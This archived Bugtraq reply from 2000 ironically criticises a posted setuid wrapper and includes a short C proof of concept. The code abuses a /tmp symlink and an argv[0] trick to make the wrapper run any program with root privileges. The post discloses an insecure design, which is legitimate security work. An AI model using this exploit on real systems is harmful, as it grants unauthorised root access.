[16774] in bugtraq
Re: Format String Attacks
daemon@ATHENA.MIT.EDU (Pavel Kankovsky)
Thu Sep 14 18:13:21 2000
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <20000913231217.5AE.0@argo.troja.mff.cuni.cz>
Date: Wed, 13 Sep 2000 23:36:40 +0200
Reply-To: Pavel Kankovsky <peak@ARGO.TROJA.MFF.CUNI.CZ>
From: Pavel Kankovsky <peak@ARGO.TROJA.MFF.CUNI.CZ>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <200009131509.KAA09328@galen.eng.auburn.edu>
On Wed, 13 Sep 2000, Doug Hughes wrote:
> Since I don't recall anybody else posting one, here is a simple, generic,
> setuid wrapper that people could use around, for instance, /usr/bin/eject
> or other setuid programs.
<ironic>
Thank you for a nice implementation of sudo that does not bother asking
for a password. Instant root for any user...very nice. But wait! It is not
complete. Here is the missing piece:
#include <malloc.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
#include <sys/param.h>
#include <limits.h>

int
main(int argc, char **argv, char **envp)
{
    char oldpath[MAXPATHLEN];
    /* room for "/tmp/", the decimal digits of a long, ".orig" and the NUL */
    char newpath[sizeof("/tmp/.orig") + (CHAR_BIT*sizeof(long)/3+1)];

    ++argv;
    srandom(getpid() + 5*time(NULL));
    if (argc < 2)
        { fprintf(stderr, "missing argument\n"); return 1; }
    /* canonical path of the program named on the command line */
    if (realpath(argv[0], oldpath) == NULL)
        { fprintf(stderr, "realpath failed\n"); return 1; }
    sprintf(newpath, "/tmp/%ld.orig", random());
    if (symlink(oldpath, newpath) == -1)
        { perror("symlink"); return 1; }
    /* cut the ".orig" suffix off again before using the name as argv[0] */
    strrchr(newpath, '.')[0] = '\0';
    argv[0] = newpath;
    execve("path-to-your-wrapper", argv, envp);
    perror("execve"); return 1;
}
</ironic>
--Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ]
"Resistance is futile. Open your source code and prepare for assimilation."